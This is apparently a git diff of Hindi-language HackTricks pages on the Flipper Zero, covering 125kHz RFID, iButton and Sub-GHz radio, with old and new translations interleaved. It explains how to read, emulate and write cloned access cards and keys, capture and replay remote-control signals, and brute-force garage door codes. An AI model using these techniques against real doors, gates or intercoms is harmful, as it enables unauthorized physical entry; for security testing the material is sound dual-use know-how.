* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details>
## परिचय
125kHz टैग काम करने के बारे में अधिक जानकारी के लिए यह देखें:
125kHz टैग्स कैसे काम करते हैं, इसके बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="../../../radio-hacking/pentesting-rfid.md" %}
[pentesting-rfid.md](../../../radio-hacking/pentesting-rfid.md)
{% endcontent-ref %}
## कार्रवाई
## क्रियाएँ
इन प्रकार के टैग के बारे में अधिक जानकारी के लिए [**इस परिचय**](../../../radio-hacking/pentesting-rfid.md#low-frequency-rfid-tags-125khz) को पढ़ें।
इन प्रकार के टैग्स के बारे में अधिक जानकारी के लिए [**यह परिचय पढ़ें**](../../../radio-hacking/pentesting-rfid.md#low-frequency-rfid-tags-125khz).
### पढ़ें
कार्ड जानकारी को **पढ़ने** का प्रयास करें। फिर इसे **उत्पन्न** कर सकते हैं
कार्ड की जानकारी **पढ़ने** का प्रयास करता है। फिर इसे **अनुकरण** कर सकता है
{% hint style="warning" %}
ध्यान दें कि कुछ इंटरकॉम्स अपने आप को कुंजी की प्रतिलिपि से सुरक्षित करने का प्रयास करते हैं जो पढ़ने से पहले एक लिखित आदेश भेजकर करते हैं। यदि लिखित आदेश सफल होता है, तो वह टैग नकली माना जाता है। जब Flipper RFID की अनुकरण करता है, तो पाठक को मूल से इसे अलग नहीं करने का कोई तरीका नहीं होता है, इसलिए ऐसी कोई समस्या नहीं होती है
ध्यान दें कि कुछ इंटरकॉम्स कुंजी डुप्लिकेशन से बचाव के लिए पढ़ने से पहले एक लिखने का कमांड भेजते हैं। यदि लिखना सफल होता है, तो उस टैग को नकली माना जाता है। जब Flipper RFID का अनुकरण करता है तो पाठक के लिए इसे मूल से अलग करने का कोई तरीका नहीं होता, इसलिए ऐसी कोई समस्या नहीं होती।
{% endhint %}
### मैन्युअल रूप से जोड़ें
### मैन्युअल जोड़ें
आप **Flipper Zero में फ़र्ज़ी कार्ड बना सकते हैं और डेटा को मैन्युअल रूप से दर्ज करके उसे उत्पन्न** कर सकते हैं।
आप Flipper Zero में **नकली कार्ड्स बना सकते हैं जिसमें आप मैन्युअली डेटा इंगित करते हैं** और फिर इसे अनुकरण कर सकते हैं।
#### कार्ड पर आईडी
#### कार्ड्स पर IDs
कभी-कभी, जब आप कार्ड प्राप्त करते हैं, तो आपको कार्ड में लिखी गई आईडी (या भाग) मिलती है
कभी-कभी, जब आपको एक कार्ड मिलता है तो आपको कार्ड पर लिखी गई ID (या उसका हिस्सा) दिखाई देगी
* **EM Marin**
उदाहरण के लिए, इस EM-Marin कार्ड में शारीरिक कार्ड में **पढ़ा जा सकता है** कि पिछले 5 बाइट में से 3 बाइट **स्पष्ट में पढ़ा जा सकता है**।\
गर आप कार्ड से उन्हें पढ़ नहीं सकते हैं, तो आप उन्हें ब्रूट-फ़ोर्स कर सकते हैं
उदाहरण के लिए इस EM-Marin कार्ड में भौतिक कार्ड पर संभव है कि आप **पिछले 3 में से 5 बाइट्स को स्पष्ट रूप से पढ़ सकें**।\
न्य 2 को ब्रूट-फोर्स किया जा सकता है यदि आप उन्हें कार्ड से पढ़ नहीं सकते
<figure><img src="../../../.gitbook/assets/image (30).png" alt=""><figcaption></figcaption></figure>
* **HID**
इस HID कार्ड में भी ऐसा ही होता है जहां केवल 3 बाइट में से 2 बाइट कार्ड में मुद्रित मिलते हैं
इस HID कार्ड में भी ऐसा ही होता है जहां कार्ड पर छपे हुए केवल 2 में से 3 बाइट्स पाए जा सकते हैं
<figure><img src="../../../.gitbook/assets/image (15) (3).png" alt=""><figcaption></figcaption></figure>
### उत्पन्न/लिखें
### अनुकरण/लिखें
कार्ड की **नकल बनाने** या आईडी **मैन्युअल रूप से दर्ज करने** के बाद, इसे Flipper Zero के साथ **उत्पन्न** किया जा सकता है या इसे एक वास्तविक कार्ड में **लिखा** जा सकता है।
कार्ड की **नकल** करने के बाद या ID **मैन्युअली दर्ज** करने के बाद इसे Flipper Zero के साथ **अनुकरण** किया जा सकता है या एक वास्तविक कार्ड में **लिखा** जा सकता है।
## संदर्भ
@ -63,6 +65,14 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनल
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details>

46
todo/radio-hacking/flipper-zero/fz-ibutton.md
View file

@ -2,27 +2,29 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PR जमा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
## परिचय
आईबटन क्या है इसके बारे में अधिक जानकारी के लिए देखें:
iButton क्या है, इसके बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="../ibutton.md" %}
[ibutton.md](../ibutton.md)
{% endcontent-ref %}
## डिजाइन
## डिजाइन
निम्नलिखित छवि का **नीला** हिस्सा यह दिखाता है कि आपको **वास्तविक आईबटन को** कैसे रखना होगा ताकि फ्लिपर इसे **पढ़ सके।** **हरी** भाग यह दिखाता है कि आपको फ्लिपर जीरो को **इंटरनल आईबटन की तरह सही ढंग से छूना** होगा
निम्नलिखित छवि का **नीला** भाग यह दर्शाता है कि आपको असली iButton को कैसे **रखना चाहिए** ताकि Flipper इसे **पढ़ सके।** **हरा** भाग यह दर्शाता है कि आपको Flipper zero को रीडर से कैसे **स्पर्श करना चाहिए** ताकि iButton का **सही ढंग से अनुकरण** किया जा सके
<figure><img src="../../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
@ -30,18 +32,18 @@
### पढ़ें
पढ़ने के मोड में फ्लिपर आईबटन की प्रतीक्षा कर रहा है और तीन प्रकार की कुंजियों को पारित कर सकता है: **डैलास, साइफ्रल और मेटाकॉम**। फ्लिपर खुद ही कुंजी के प्रोटोकॉल का पता लगा लेगा। कुंजी प्रोटोकॉल का नाम ID नंबर के ऊपर स्क्रीन पर प्रदर्शित होगा।
Read Mode में Flipper iButton की कुंजी को स्पर्श करने की प्रतीक्षा कर रहा होता है और यह तीन प्रकार की कुंजियों: **Dallas, Cyfral, और Metakom** को पचा सकता है। Flipper **स्वयं कुंजी के प्रकार का पता लगा लेगा**। कुंजी प्रोटोकॉल का नाम ID नंबर के ऊपर स्क्रीन पर प्रदर्शित होगा।
### मैन्युअल रूप से जोड़ें
### मैन्युअल जोड़ें
**मैन्युअल रूप से** आईबटन को जोड़ना संभव है: **डैलास, साइफ्रल और मेटाकॉम**
आप मैन्युअली एक iButton जोड़ सकते हैं जिसका प्रकार हो: **Dallas, Cyfral, और Metakom**
### **उत्पन्न करें**
### **अनुकरण करें**
सहेजे गए आईबटन (पढ़ें या मैन्युअल रूप से जोड़े गए) को **उत्पन्न करना संभव है।**
सहेजे गए iButtons (पढ़े गए या मैन्युअली जोड़े गए) का **अनुकरण** करना संभव है।
{% hint style="info" %}
यदि आप फ्लिपर जीरो के अपेक्षित संपर्कों को छूने में सक्षम नहीं हो सकते हैं, तो आप **बाहरी GPIO का उपयोग कर सकते हैं:**
यदि आप Flipper Zero के अपेक्षित संपर्कों को रीडर से स्पर्श नहीं करा पा रहे हैं तो आप **बाहरी GPIO का उपयोग कर सकते हैं:**
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (24) (1).png" alt=""><figcaption></figcaption></figure>
@ -52,12 +54,14 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PR जमा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

134
todo/radio-hacking/flipper-zero/fz-sub-ghz.md
View file

@ -1,20 +1,22 @@
# FZ - सब-जीएचजी
# FZ - Sub-GHz
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड करने** की पहुंच चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके** अपना योगदान दें।
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संदेशों को खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, सभी मुद्दों को खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज
सबसे महत्वपूर्ण कमजोरियों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी अटैक सरफेस को ट्रैक करता है, सक्रिय खतरे के स्कैन चलाता है, आपके पूरे टेक स्टैक में मुद्दों को खोजता है, APIs से लेकर वेब ऐप्स और क्लाउड सिस्टम्स तक। आज ही [**मुफ्त में आजमाएं**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,93 +24,67 @@
## परिचय <a href="#kfpn7" id="kfpn7"></a>
Flipper Zero में एक बिल्ट-इन मॉड्यूल है जो **300-928 मेगाहर्ट्ज़** की रेंज में रेडियो फ्रीक्वेंसी को प्राप्त और प्रेषित कर सकता है, जो रिमोट कंट्रोल को पढ़, सहेज और नकल कर सकता है। ये कंट्रोल गेट, बैरियर, रेडियो लॉक, रिमोट कंट्रोल स्विच, वायरलेस डोरबेल, स्मार्ट लाइट्स और अधिक के साथ इंटरैक्शन के लिए उपयोग किए जाते हैं। Flipper Zero आपकी सुरक्षा को जांचने में मदद कर सकता है।
Flipper Zero **300-928 MHz रेंज में रेडियो फ्रीक्वेंसी प्राप्त और प्रसारित कर सकता है** अपने निर्मित मॉड्यूल के साथ, जो रिमोट कंट्रोल्स को पढ़, सहेज और अनुकरण कर सकता है। ये कंट्रोल्स गेट्स, बैरियर्स, रेडियो लॉक्स, रिमोट कंट्रोल स्विचेस, वायरलेस डोरबेल्स, स्मार्ट लाइट्स और अधिक के साथ इंटरैक्शन के लिए इस्तेमाल किए जाते हैं। Flipper Zero आपको यह जानने में मदद कर सकता है कि क्या आपकी सुरक्षा समझौता हो गई है।
<figure><img src="../../../.gitbook/assets/image (3) (2) (1).png" alt=""><figcaption></figcaption></figure>
## सब-जीएचजी हार्डवेयर <a href="#kfpn7" id="kfpn7"></a>
## Sub-GHz हार्डवेयर <a href="#kfpn7" id="kfpn7"></a>
Flipper Zero में एक बिल्ट-इन सब-1 जीएचजी मॉड्यूल है, जो [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 चिप](https://www.ti.com/lit/ds/symlink/cc1101.pdf) पर आधारित है और एक रेडियो एंटीना है (अधिकतम दूरी 50 मीटर है)। CC1101 चिप और एंटीना दोनों 300-348 मेगाहर्ट्ज़, 387-464 मेगाहर्ट्ज़ और 779-928 मेगाहर्ट्ज़ बैंड में कार्य करने के लिए डिज़ाइन किए गए हैं।
Flipper Zero में एक निर्मित sub-1 GHz मॉड्यूल है जो [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 चिप](https://www.ti.com/lit/ds/symlink/cc1101.pdf) पर आधारित है और एक रेडियो एंटीना है (अधिकतम रेंज 50 मीटर है)। CC1101 चिप और एंटीना दोनों 300-348 MHz, 387-464 MHz, और 779-928 MHz बैंड्स में फ्रीक्वेंसीज पर संचालित होने के लिए डिज़ाइन किए गए हैं।
<figure><img src="../../../.gitbook/assets/image (1) (8) (1).png" alt=""><figcaption></figcaption></figure>
## कार्रवाई
## क्रियाएँ
### फ्रीक्वेंसी विश्लेषक
### फ्रीक्वेंसी एनालाइज़र
{% hint style="info" %}
कैसे पता करें कि रिमोट कौन सी फ्रीक्वेंसी का उपयोग कर रहा है
रिमोट किस फ्रीक्वेंसी का उपयोग कर रहा है यह जानने के लिए कैसे
{% endhint %}
विश्लेषण करते समय, Flipper Zero फ्रीक्वेंसी कॉन्फ़िगरेशन में उपलब्ध सभी फ्रीक्वेंसी पर सिग्नल स्ट्रेंग्थ (RSSI) स्कैन कर रहा है। Flipper Zero सबसे अधिक RSSI मान वाली फ्रीक्वेंसी को प्रदर्शित करता है, जिसमें सिग्नल स्ट्रेंग्थ -90 [dBm](https://en.wikipedia.org/wiki/DBm) से अधिक होती है।
विश्लेषण करते समय, Flipper Zero फ्रीक्वेंसी कॉन्फ़िगरेशन में उपलब्ध सभी फ्रीक्वेंसी पर सिग्नल स्ट्रेंथ (RSSI) को स्कैन कर रहा है। Flipper Zero स्क्रीन पर -90 [dBm](https://en.wikipedia.org/wiki/DBm) से अधिक सिग्नल स्ट्रेंथ वाली फ्रीक्वेंसी का मूल्य प्रदर्शित करता है।
रिमोट की फ्रीक्वेंसी निर्धारित करने के लिए, निम्नलिखित कार्रवाई करें:
रिमोट की फ्रीक्वेंसी निर्धारित करने के लिए, निम्नलिखित करें:
1. रिमोट कंट्रोल को Flipper Zero के बाईं ओर बहुत करीब रखें।
2. **मुख्य मेनू** **→ Sub-GHz** पर जाएं।
3. **फ्रीक्वेंसी एनालाइज़र** चुनें, फिर उस बटन को दबाएं और पकड़ें जिसे आप विश्लेषण करना चाहते हैं।
4. स्क्रीन पर फ्रीक्वेंसी मूल्य की समीक्षा करें।
### पढ़ें
{% hint style="info" %}
उपयोग की गई फ्रीक्वेंसी के बारे में जानकारी पाएं (यह भी एक और तरीका है जिससे पता चलता है कि कौन सी फ्रीक्वेंसी इस्तेमाल की जा रही है)
{% endhint %}
**पढ़ें** विकल्प **निर्धारित फ्रीक्वेंसी पर सुनता है** इंगित मॉड्यूलेशन पर: डिफ़ॉल्ट रूप से 433.92 AM। यदि **कुछ पाया जाता है** पढ़ते समय, **स्क्रीन पर जानकारी दी जाती है**। इस जानकारी का उपयोग भविष्य में सिग्नल को दोहराने के लिए किया जा सकता है।
पढ़ते समय, **बाईं बटन** दबाकर और **कॉन्फ़िगर करना** संभव है।\
इस समय इसमें **4 मॉड्यूलेशन** (AM270, AM650, FM328 और FM476) हैं, और **कई प्रासंगिक फ्रीक्वेंसीज** संग्रहीत हैं:
<figure><img src="../../../.gitbook/assets/image (28).png" alt=""><figcaption></figcaption></figure>
आप **कोई भी जो आपको दिलचस्प लगे** सेट कर सकते हैं, हालांकि, यदि आप **निश्चित नहीं हैं कि कौन सी फ्रीक्वेंसी** आपके पास रिमोट द्वारा इस्तेमाल की जा सकती है, तो **Hopping को ON पर सेट करें** (डिफ़ॉल्ट रूप से Off), और बटन को कई बार दबाएं जब तक Flipper इसे पकड़ न ले और आपको फ्रीक्वेंसी सेट करने के लिए जरूरी जानकारी न दे।
{% hint style="danger" %}
फ्रीक्वेंसीज के बीच स्विच करने में कुछ समय लगता है, इसलिए स्विचिंग के समय प्रसारित सिग्नल्स छूट सकते हैं। बेहतर सिग्नल रिसेप्शन के लिए, फ्रीक्वेंसी एनालाइज़र द्वारा निर्धारित एक निश्चित फ्रीक्वेंसी सेट करें।
{% endhint %}
### **रॉ पढ़ें**
{% hint style="info" %}
सुनी गई फ्रीक्वेंसी में एक सिग्नल को चुराएं (और दोहराएं)
{% endhint %}
**रॉ पढ़ें** विकल्प **सुनी गई फ्रीक्वेंसी में सिग्नल्स को रिकॉर्ड करता है**। इसका उपयोग एक सिग्नल को **चुराने** और **दोहराने** के लिए किया जा सकता है।
डिफ़ॉल्ट रूप से **रॉ पढ़ें भी 433.92 में AM650 पर है**, लेकिन यदि पढ़ें विकल्प के साथ आपने पाया कि आपको दिलचस्पी वाला सिग्नल एक **अलग फ्रीक्वेंसी/मॉड्यूलेशन में है, तो आप वह भी बदल सकते हैं** बाईं ओर दबाकर (रॉ पढ़ें विकल्प के अंदर)।
1. रिमोट कंट्रोल को Flipper Zero के बाएं बहुत करीब रखें।
2. **मुख्य मेनू** **→ सब-जीएचजी** पर जाएं।
3. **फ्रीक्वेंसी विश्लेषक** का चयन करें, फिर वह बटन द
### ब्रूट-फोर्स
यदि आप गेराज द्वार द्वारा उपयोग किए जाने वाले प्रोटोकॉल को जानते हैं, तो आप फ्लिपर जीरो के साथ सभी कोड उत्पन्न कर सकते हैं और उन्हें भेज सकते हैं। यह एक उदाहरण है जो आमतौर पर उपयोग होने वाले गेराजों के सामान्य प्रकार का समर्थन करता है: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)\*\*\*\*
यदि आप जानते हैं कि गैरेज दरवाजे द्वारा उपयोग की गई प्रोटोकॉल क्या है, तो सभी कोड्स को **जनरेट करना और Flipper Zero के साथ भेजना संभव है।** यह एक उदाहरण है जो सामान्य सामान्य प्रकार के गैरेजों का समर्थन करता है: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)\*\*\*\*
### मैन्युअल रूप से जोड़ें
### मैन्युअल जोड़ें
{% hint style="info" %}
प्रोटोकॉल की एक विन्यासित सूची से संकेत जोड़ें
{% endhint %}
#### [समर्थित प्रोटोकॉल](https://docs.flipperzero.one/sub-ghz/add-new-remote) की सूची <a href="#3iglu" id="3iglu"></a>
| Princeton\_433 (सभी स्थिर कोड प्रणालियों के साथ काम करता है) | 433.92 | स्थिर |
| --------------------------------------------------------------- | ------ | ------- |
| Nice Flo 12bit\_433 | 433.92 | स्थिर |
| Nice Flo 24bit\_433 | 433.92 | स्थिर |
| CAME 12bit\_433 | 433.92 | स्थिर |
| CAME 24bit\_433 | 433.92 | स्थिर |
| Linear\_300 | 300.00 | स्थिर |
| CAME TWEE | 433.92 | स्थिर |
| Gate TX\_433 | 433.92 | स्थिर |
| DoorHan\_315 | 315.00 | गतिशील |
| DoorHan\_433 | 433.92 | गतिशील |
| LiftMaster\_315 | 315.00 | गतिशील |
| LiftMaster\_390 | 390.00 | गतिशील |
| Security+2.0\_310 | 310.00 | गतिशील |
| Security+2.0\_315 | 315.00 | गतिशील |
| Security+2.0\_390 | 390.00 | गतिशील |
### समर्थित सब-जीएच विक्रेता
[https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors) में सूची देखें
### क्षेत्र द्वारा समर्थित आवृत्तियाँ
[https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies) में सूची देखें
### परीक्षण
{% hint style="info" %}
सहेजी गई आवृत्तियों के dBm प्राप्त करें
{% endhint %}
## संदर्भ
* [https://docs.flipperzero.one/sub-ghz](https://docs.flipperzero.one/sub-ghz)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे संवेदनशीलता खोजें जो सबसे महत्वपूर्ण हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला प्रविष्टि को ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी टेक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक, सभी मुद्दों को खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
